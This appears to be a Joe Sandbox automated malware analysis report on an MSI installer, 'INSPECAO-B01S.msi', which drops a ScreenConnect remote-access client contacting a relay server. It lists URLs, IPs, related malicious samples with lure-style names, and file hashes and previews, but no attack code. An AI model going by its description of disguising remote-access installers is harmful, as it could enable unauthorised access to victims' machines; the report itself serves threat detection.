http://www.carterandcone.coml	ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://instance-xkznvd-relay.screenconnect.com:443/r	ScreenConnect.ClientService.exe, 00000006.00000002.2939627103.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.sajatypeworks.com	ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g.live.com/odclientsettings/Prod.C:	edb.log.8.dr	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://wixtoolset.org/releases/	rundll32.exe, 00000003.00000003.1697090286.0000000004801000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1697090286.0000000004872000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr, Microsoft.Deployment.WindowsInstaller.dll.3.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr, Microsoft.Deployment.Compression.dll.3.dr	false		unknown
http://www.founder.com.cn/cn	ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g.live.com/odclientsettings/ProdV2	edb.log.8.dr	false	URL Reputation: safe	unknown
http://instance-xkznvd-relay.screenconnect.com:443/8	ScreenConnect.ClientService.exe, 00000006.00000002.2939627103.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96	svchost.exe, 00000008.00000003.1757539471.0000017F930F2000.00000004.00000800.00020000.00000000.sdmp, edb.log.8.dr	false	URL Reputation: safe	unknown
http://instance-xkznvd-relay.screenconnect.com:443/	ScreenConnect.ClientService.exe, 00000006.00000002.2939627103.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.jiyu-kobo.co.jp/	ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://feedback.screenconnect.com/Feedback.axd	ScreenConnect.Core.dll.3.dr	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sandoll.co.kr	ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.0000000002002000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 00000008.00000003.1757539471.0000017F930F2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
147.75.63.168	server-nix9656e2a4-relay.screenconnect.com	Switzerland		54825	PACKETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1543205
Start date and time:	2024-10-27 12:00:14 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	INSPECAO-B01S.msi
Detection:	MAL
Classification:	mal72.evad.winMSI@15/71@3/2
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 78% Number of executed functions: 240 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .msi

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target rundll32.exe, PID 7464 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: INSPECAO-B01S.msi

Simulations

Behavior and APIs

Time	Type	Description
07:01:13	API Interceptor	2x Sleep call for process: svchost.exe modified
07:01:21	API Interceptor	1x Sleep call for process: ScreenConnect.ClientService.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
147.75.63.168	ScreenConnect.Client (9).exe	Get hash	malicious	ScreenConnect Tool	Browse
147.75.63.168	ScreenConnect.Client (9).exe	Get hash	malicious	ScreenConnect Tool	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
server-nix9656e2a4-relay.screenconnect.com	https://ssawellsclientsecio.su/1/Viewer/	Get hash	malicious	ScreenConnect Tool	Browse	147.75.63.168
	ScreenConnect.Client (9).exe	Get hash	malicious	ScreenConnect Tool	Browse	147.75.63.168
	ScreenConnect.Client (9).exe	Get hash	malicious	ScreenConnect Tool	Browse	147.75.63.168

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
PACKETUS	splarm.elf	Get hash	malicious	Unknown	Browse	147.75.50.67
	sh4.elf	Get hash	malicious	Mirai	Browse	107.161.124.133
	la.bot.sparc.elf	Get hash	malicious	Unknown	Browse	147.75.86.19
	la.bot.sh4.elf	Get hash	malicious	Unknown	Browse	147.75.77.156
	1.exe	Get hash	malicious	ScreenConnect Tool	Browse	147.75.84.232
	1.exe	Get hash	malicious	ScreenConnect Tool	Browse	147.75.84.232
	arm6.elf	Get hash	malicious	Unknown	Browse	107.161.124.106
	1kqLF3lHvm.elf	Get hash	malicious	Mirai	Browse	147.75.37.89
	AF1cyL4cv6.vbs	Get hash	malicious	AsyncRAT	Browse	193.26.115.68
	4d5ZJqq0M7.vbs	Get hash	malicious	AsyncRAT	Browse	193.26.115.68

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Client.dll	1.exe	Get hash	malicious	ScreenConnect Tool	Browse
	1.exe	Get hash	malicious	ScreenConnect Tool	Browse
	5iT2ITz44g.exe	Get hash	malicious	ScreenConnect Tool	Browse
	5iT2ITz44g.exe	Get hash	malicious	ScreenConnect Tool	Browse
	E-receipt-67.exe	Get hash	malicious	ScreenConnect Tool	Browse
	E-receipt-67.exe	Get hash	malicious	ScreenConnect Tool	Browse
	statment.exe	Get hash	malicious	ScreenConnect Tool	Browse
	statment.exe	Get hash	malicious	ScreenConnect Tool	Browse
	eBill.Client.exe	Get hash	malicious	ScreenConnect Tool	Browse
	Express-Shopping-Receipt.Client (1).exe	Get hash	malicious	ScreenConnect Tool	Browse
C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.dll	1.exe	Get hash	malicious	ScreenConnect Tool	Browse
	1.exe	Get hash	malicious	ScreenConnect Tool	Browse
	5iT2ITz44g.exe	Get hash	malicious	ScreenConnect Tool	Browse
	5iT2ITz44g.exe	Get hash	malicious	ScreenConnect Tool	Browse
	E-receipt-67.exe	Get hash	malicious	ScreenConnect Tool	Browse
	E-receipt-67.exe	Get hash	malicious	ScreenConnect Tool	Browse
	statment.exe	Get hash	malicious	ScreenConnect Tool	Browse
	statment.exe	Get hash	malicious	ScreenConnect Tool	Browse
	eBill.Client.exe	Get hash	malicious	ScreenConnect Tool	Browse
	Express-Shopping-Receipt.Client (1).exe	Get hash	malicious	ScreenConnect Tool	Browse

Created / dropped Files

C:\Config.Msi\4c1433.rbs

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	219219
Entropy (8bit):	6.581622499442833
Encrypted:	false
SSDEEP:	3072:6Z9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG8:6ZuH2aCGw1ST1wQLdqv8
MD5:	5213019BDBC956CBD60611D6DAE632C1
SHA1:	6BFD731A07183457C755070B4C1184F121148458
SHA-256:	79E945A332F85DC8D33FCD03B7D8F3FF69AC7BD07196968193A87EB74C2A4724
SHA-512:	5389E299EB6A73A3724305C9FD7D6FEB1E363B802645C1820FDB8BB971154BE51154B78A74BAB8475225B777A8E2217D1C6D8ABFCA7F37A3779F799A4C0EBCFF
Malicious:	false
Yara Hits:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\4c1433.rbs, Author: Joe Security
Reputation:	low
Preview:	...@IXOS.@.....@&8[Y.@.....@.....@.....@.....@.....@......&.{87BA6F17-ED48-2213-B0B4-DE77D334918D}'.ScreenConnect Client (3a24aebb8959bcfa)..INSPECAO-B01S.msi.@.....@.....@.....@......DefaultIcon..&.{87BA6F17-ED48-2213-B0B4-DE77D334918D}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (3a24aebb8959bcfa)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{D42CA421-A3C1-15D6-4810-B6C0D604145C}&.{87BA6F17-ED48-2213-B0B4-DE77D334918D}.@......&.{75EF4394-3270-ADB6-D593-0F8202C9237A}&.{87BA6F17-ED48-2213-B0B4-DE77D334918D}.@......&.{915C500B-050C-F208-AC35-E6715450BEFD}&.{87BA6F17-ED48-2213-B0B4-DE77D334918D}.@......&.{66099479-28F9-2049-9618-081E57EB56D4}&.{87BA6F17-ED48-2213-B0B4-DE77D334918D}.@......&.{A87D7104-E336-09A2-6333-F82F4C52D191}&.{87BA6F17-ED48-2213-B0B4-DE77D334918D}.@......&.{3459A6C5-E076-49CD-75D9-5D245A4DA9A3}&.{87BA6F17-ED48-2213-B0B4-DE77D334918

C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\Client.en-US.resources

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	49959
Entropy (8bit):	4.758252520953682
Encrypted:	false
SSDEEP:	1536:sdr6QF+gQpAfqiErOmOCqZUWi+JgJ0FQi9zwHLAhDKZ1HtRKekmrg9:sdr1F+gQOlErOmPqZUWi+JgJ0FQi9zw2
MD5:	511202ED0BA32D7F09EAB394C917D067
SHA1:	DBD611720FD1730198F72DEC09E8E23E6D6488F8
SHA-256:	F8398A235B29AF6569F2B116E0299B95512D042F5A4CD38C98C79729A5FBDB9D
SHA-512:	F04B08938F3EBF8CFA1A1157A94DA3AE4699494BDCE566619AFA5B13A8F6EBE556D522C064E5EA02E343B59A489343F77E3EA2BB2EA390AAE35A626F41CADC77
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C\|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..v.......B....A...a......D..c..w..K,..t...S.....v....7.6\|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........\|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...

C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\Client.resources

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	26722
Entropy (8bit):	7.7401940386372345
Encrypted:	false
SSDEEP:	384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
MD5:	5CD580B22DA0C33EC6730B10A6C74932
SHA1:	0B6BDED7936178D80841B289769C6FF0C8EEAD2D
SHA-256:	DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
SHA-512:	C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.

C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Client.dll

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	197120
Entropy (8bit):	6.595800276062395
Encrypted:	false
SSDEEP:	3072:TS77Zz8NtrNOuJTaFs2VUXEWcyzvXqu5zDvJXYt:E7OrJOuJE4Xawqu5G
MD5:	F311A8217807F6C85817058522E234A2
SHA1:	CEB586B3CF7B0EE86EA8242D9B3D8641C9444CD1
SHA-256:	032450CD037D9E0EEC49E0B4FF44073D539775633FB4AF6FD76D4CB19116AAC9
SHA-512:	5EF1F6B595AF9CC7F788680AC3F3E9B8B12BAAFE734A8E2F675BAA57F5EF2C69806492911BDA54F11C5A4B8CF3CCED82CFC6E0ECF214E45083E9F9AA6A83D039
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 1.exe, Detection: malicious, Browse Filename: 1.exe, Detection: malicious, Browse Filename: 5iT2ITz44g.exe, Detection: malicious, Browse Filename: 5iT2ITz44g.exe, Detection: malicious, Browse Filename: E-receipt-67.exe, Detection: malicious, Browse Filename: E-receipt-67.exe, Detection: malicious, Browse Filename: statment.exe, Detection: malicious, Browse Filename: statment.exe, Detection: malicious, Browse Filename: eBill.Client.exe, Detection: malicious, Browse Filename: Express-Shopping-Receipt.Client (1).exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k%..........." ..0................. ... ....... .......................`.......L....@.....................................O.... ..\|....................@......4...8............................................ ............... ..H............text...P.... ...................... ..`.rsrc...\|.... ......................@..@.reloc.......@......................@..B........................H.......................^................................................(......(....^.(...........%...}....:.(......}....:.(......}....:.(......}......{....:.(......}.....0..A........(....s....%.~'...%-.&~&.....y...s....%.'...(...+(...+o"...o........0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.%...($....5..............s%....=.....0...........~)...%-.&~(.....\|...s&...%.)...(...+..~...%-.&~(.....}...s(...%.*...(...+.r9..

C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.dll

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	68096
Entropy (8bit):	6.081952570081618
Encrypted:	false
SSDEEP:	1536:XxgIAw8rVbpcgOswatz8Bn2yRIZMmQ9VIlxnBVb8ER:Xw31b4f0Q9VAnNR
MD5:	3FF07C657068430EF677181D1F67066D
SHA1:	37F7E9D2CCB65B4EA2733393015635EA1B43393E
SHA-256:	D17CF13612039F6A4CA17B56C32399CCBE279A499C8D2F8E910B1FD6F4FFF2B1
SHA-512:	5552208B5649CEAC2B32510EA12D409A85643D27E6A9C335E049195A507AE9211AEE77574376FDE059747998B60AE041E191635A67C3461585ABA7F9B877B095
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 1.exe, Detection: malicious, Browse Filename: 1.exe, Detection: malicious, Browse Filename: 5iT2ITz44g.exe, Detection: malicious, Browse Filename: 5iT2ITz44g.exe, Detection: malicious, Browse Filename: E-receipt-67.exe, Detection: malicious, Browse Filename: E-receipt-67.exe, Detection: malicious, Browse Filename: statment.exe, Detection: malicious, Browse Filename: statment.exe, Detection: malicious, Browse Filename: eBill.Client.exe, Detection: malicious, Browse Filename: Express-Shopping-Receipt.Client (1).exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C............." ..0..............!... ...@....... ....................................@.................................-!..O....@.......................`....... ..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................a!......H.......Po....................... ........................................(....^.(...........%...}....:.(......}....:.(......}....:.(......}.....~,...%-.&~+.....j...s....%.,...(...+vs....%.}Q.........s....(........0...........s....}.....s....}...........}.......('.....}.....(....&.(..........s....o.....(*...~-...%-.&~+.....k...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s>...}....... ..6........s....s>...}.....((...($............o%........

C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	95520
Entropy (8bit):	6.505417048098125
Encrypted:	false
SSDEEP:	1536:jg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgIU0HMm7/xK:MhbNDxZGXfdHrX7rAc6myJkgIU0HVY
MD5:	826314610D9E854477B08666330940B5
SHA1:	65B601D60042CF6F263CD38AC2F63CD06A9DE159
SHA-256:	E54963CB63C9E471E2D3D59E55E4C7AEEDCCAFDD616B99C4B3AF230608E4BCC9
SHA-512:	5C01D6DE25D60EB6B1EB72B7FA6401B71153C2A740C41AEEB2BD302CC4E80F5C1A388B647EE16DA196705AC8EDBC60ABDA49B9A531517BB85959CC018FB5D1FB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................-.....@.................................p...x....`..P............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Core.dll

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	546304
Entropy (8bit):	6.03286879586464
Encrypted:	false
SSDEEP:	6144:hAUz5UEsIXxk3QCLKSkGEexE77VcYbUinCLrDfElYzMsdqe1J6tMznSAiOUfw8qg:hK67tEshnkDfyt9MznZd8PTIP8
MD5:	3B1BA4BEBEFDC8A95B0F2F0B4E50C527
SHA1:	15551D2E8BFB829F3A96D161B43DE820C0D417CE
SHA-256:	A843B3A4549C43EF5BD8470CACF5D2F0F3B3C8110441FCC10079FACC7DB3DE29
SHA-512:	F41595586CD5330537F5F02B392310B028E36F618E2583D125430ECD103EBBF6D2CF6BEFCFB1B32279EEB9FD7EF018F49131E3906FB61BC324DA85D93A9A18C7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..N...........i... ........... ....................................@..................................h..O.......t...........................<h..8............................................ ............... ..H............text...@M... ...N.................. ..`.rsrc...t............P..............@..@.reloc...............T..............@..B.................i......H........@...&...................g........................................{:.....{;...V.(<.....}:.....};......0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...... ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D.....{E.....{F...V.(<.....}E.....}F....0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...... F.b# )UU.

C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Windows.dll

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1721344
Entropy (8bit):	6.638160977312247
Encrypted:	false
SSDEEP:	24576:jQNtbLFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTs5:jebLJkGYYpT0+TFiH7efP
MD5:	D196174CF03F86C8776E717F07D5D19F
SHA1:	BBD2C6A59229B3E4EC7C5742248F3F55A61DD216
SHA-256:	A1EDD67A131505CC84D76601474C53874A56B5437B835838E4A866E20F6CD264
SHA-512:	CF4D159BCB42A1A7EA03F8877736CACE109AE79998906B9178C74F7A9B63030CDDC2BC94EF6C5F718E99C2D0039CF3589F8C4F2BF5B67DB94B3B96D2C988B45B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....A............" ..0..<..........Z[... ...`....... ....................................@..................................[..O....`..\|...........................dZ..8............................................ ............... ..H............text...h;... ...<.................. ..`.rsrc...\|....`.......>..............@..@.reloc...............B..............@..B................;[......H.......,...................0....Y........................................()...^.()..........%...}....:.().....}....:.().....}....:.().....}......s.....s+...:.(,.....(-.....{...."..}....J.(/........(0...&:.(,.....(1.....{2..."..}2....0..(........(3......+.............(0...&..X....i2.v.(,....s4...}.....s5...}....v.{.....r...p(...+.....o7.....0...........o8....+..o9......(...+&.o....-....,..o................."........{..........o:...&.......(.........0..L...

C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsAuthenticationPackage.dll

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	260168
Entropy (8bit):	6.416438906122177
Encrypted:	false
SSDEEP:	3072:qJvChyA4m2zNGvxDd6Q6dtaVNVrlaHpFahvJ9ERnWtMG8Ff2lt9Bgcld5aaYxg:0IvxDdL6d8VNdlC3g0RCXh5D
MD5:	5ADCB5AE1A1690BE69FD22BDF3C2DB60
SHA1:	09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
SHA-256:	A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
SHA-512:	812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A........................T....................V.......V.......V......................=U......=U......=U$.....=U......Rich....................PE..d.....Qf.........." ...'.^...^.......................................................(....`..........................................e.......f..P................ ......HP..........P%..p............................$..@............p...............................text...t].......^.................. ..`.rdata.......p.......b..............@..@.data....+...........d..............@....pdata... ......."...x..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................

C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsBackstageShell.exe

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	61216
Entropy (8bit):	6.316664164724877
Encrypted:	false
SSDEEP:	1536:9Ai+zmNzdj8bv8DtYQ4RE+TC34/ibdt7Xx56:9UzmNDYQbEQta
MD5:	C1F206B0C0058DC4CC7B9F3125F61E20
SHA1:	541A1564799DA24C48BE188888F306381EF23728
SHA-256:	94E711FD79FC81084FB222FF927893669DDBA9890C6622DD4981FB5766438A63
SHA-512:	6163A255DAF2DC9EC14391F31CA09A466B7B33662F2215B9941ADD59B46CD1177E9240D2B1C42E41EA0AC9AE2EFA03F6A2D3E80497D32F6E505B813ED66DA2AD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c.8..........."...0................. ........@.. ....................... ............@.....................................O....... ............... )..............8............................................ ............... ..H............text...0.... ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S...............................................................(....^.(.......a...%...}....:.(......}....:.(......}....:.(......}........0..........(....(....(....(....r...p(....o....(....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s ...(!...s....(".....0...........(#.....($.....(%....s....%.o&...%.o'...%.o(...%s!...o)...%~....o...}......(....o+...o,....(-.....@...%..(.....o.....s/...}.....{...........s0...o1....s...

C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsBackstageShell.exe.config

Process:	C:\Windows\System32\msiexec.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
